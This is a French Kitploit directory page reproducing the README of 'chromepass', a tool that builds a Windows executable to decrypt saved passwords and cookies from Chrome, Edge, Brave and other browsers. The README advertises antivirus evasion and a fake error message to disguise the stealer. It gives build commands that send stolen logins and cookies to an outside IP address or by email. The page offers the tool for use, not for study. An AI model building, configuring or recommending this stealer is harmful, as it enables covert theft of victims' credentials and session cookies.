Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
chromepass — Chromepass - Piratage des mots de passe enregistrés de Chrome | Kitploit
Outils/GitHubGitHub/darkarp/chromepass
Cassage de Mots de PasseExfiltration de DonnéesHameçonnageRed Teaming
GitHubdarkarp/chromepass

chromepass

Chromepass - Piratage des mots de passe enregistrés de Chrome

Voir le dépôt
83811126il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chromepass - Piratage des mots de passe et cookies enregistrés de Chrome

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

Voir la démo · Signaler un bug · Demander une fonctionnalité

Table des matières

  • À propos du projet
    • Détection AV
  • Pour commencer
    • Dépendances et prérequis
    • Installation
  • Utilisation
  • Email
  • Erreurs, bugs et demandes de fonctionnalités
  • En savoir plus
  • Licence
  • Démo

À propos du projet

Chromepass est une application console basée sur Python qui génère un exécutable Windows avec les fonctionnalités suivantes :

  • Décrypter les mots de passe et cookies enregistrés de Google Chrome, Chromium, Edge, Brave, Opera et Vivaldi
  • Envoyer un fichier contenant les combinaisons login/mot de passe et les cookies à distance (serveur HTTP ou email)
  • Indétectable par les antivirus si fait correctement
  • Icône personnalisée
  • Message d'erreur personnalisé
  • Personnaliser le port

Détection AV !

La nouvelle méthodologie de construction du client garantit pratiquement un taux de détection de 0 %, même sans tactiques d'évasion antivirale. Si cela devenait faux à l'avenir, certaines méthodes seront mises en œuvre pour améliorer l'évasion antivirale.

Un exemple des derniers scans (note : en 10 à 12 heures, nous passons de 0 à 2 détections à 32 détections, alors effectuez l'analyse sur vos propres constructions) :

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

Pour commencer

Dépendances et prérequis

Il s'agit d'une application très simple, qui utilise uniquement :

  • [Python] - Testé sur Python 3.9+

Il est recommandé d'effectuer l'installation dans une machine virtuelle Windows. Certaines parties de la procédure d'installation pourraient être affectées par des configurations existantes. Cela a été testé sur une machine virtuelle Windows 10 propre.

Installation

Chromepass nécessite Windows pour compiler ! Le support de Linux et macOS pourrait être ajouté prochainement.

Cloner le dépôt :

git clone https://github.com/darkarp/chromepass

Note : Alternativement au clonage du dépôt, vous pouvez télécharger la dernière version, car le dépôt peut être plus sujet aux bugs.

Installer les dépendances :

Les dépendances sont vérifiées et installées automatiquement, vous pouvez donc passer directement à Utilisation. Il est recommandé d'utiliser une machine virtuelle propre pour éviter tout conflit. Si vous n'avez pas les dépendances et que votre connexion internet n'est pas rapide, cela prendra du temps. Allez vous chercher un café.


Utilisation

Chromepass est très simple. Commencez par exécuter :

python create.py -h

Une liste d'options apparaîtra et est explicite.

L'exécution sans paramètres construira le serveur et le client se connectant à 127.0.0.1.

Un exemple simple d'une construction :

python create.py --ip 92.34.11.220 --error --message 'An Error has happened'

Après avoir créé le serveur et le client, assurez-vous d'exécuter le serveur lorsque le client est exécuté.

Les cookies et mots de passe seront enregistrés dans des fichiers json dans un nouveau dossier nommé data dans le même répertoire que le serveur, séparés par adresse IP.


Email

Chromepass prend en charge l'envoi des fichiers par email, bien que cela soit encore expérimental. Pour activer cela, vous pouvez utiliser l'indicateur --email lors de la création du serveur. Vous aurez besoin de deux choses : un nom d'utilisateur (votre email) et un mot de passe (un mot de passe d'application).

Pour générer un mot de passe d'application, vous devez aller dans vos paramètres de compte -> Sécurité et activer l'authentification en deux étapes (obligatoire !)

Après avoir activé l'authentification en deux étapes, vous verrez une nouvelle option appelée Mots de passe d'application : 2-step-authentication

Vous devez cliquer là-bas, puis choisir les options appropriées, puis générer un mot de passe : 2-step-authentication

Après avoir cliqué sur Générer, il vous donnera le mot de passe nécessaire. Vous pouvez utiliser le nom d'utilisateur et le mot de passe directement dans la commande ou simplement les placer dans le fichier config.ini, là où il est écrit YOUR_USERNAME et YOUR_PASSWORD.

Exemple avec identifiants dans la commande

python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh

Si vous placez les identifiants dans le fichier config (vous verrez où en ouvrant ce fichier)

python create.py --error --message 'An Error has happened' --email
Télécharger l’outil